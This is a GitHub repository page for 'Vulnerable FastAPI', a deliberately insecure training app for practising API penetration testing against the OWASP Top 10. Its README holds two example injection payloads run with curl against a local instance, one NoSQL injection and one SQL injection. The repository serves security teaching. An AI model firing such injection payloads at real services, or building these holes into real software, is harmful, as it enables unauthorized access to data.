Skip to content

naryal2580/vfapi

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits

static

static

 
 

ui

ui

 
 

.gitignore

.gitignore

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

main.py

main.py

 
 

requirements.txt

requirements.txt

 
 

run.sh

run.sh

 
 

Repository files navigation

Vulnerable FastAPI Logo

Vulnerable FastAPI, compliant to OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.

Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq

Thanks

About

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

git.io/vulnfapi

Topics

sql nosql rest-api webapp vulnerable vulnerable-application vulnerable-web-app owasp-top-10 owasp-top-ten fastapi vulnerable-api owasp-top-ten-2021 owasp-top-10-2021

Resources

Readme

License

MIT license
Activity

Stars

9 stars

Watchers

1 watching

Forks

13 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages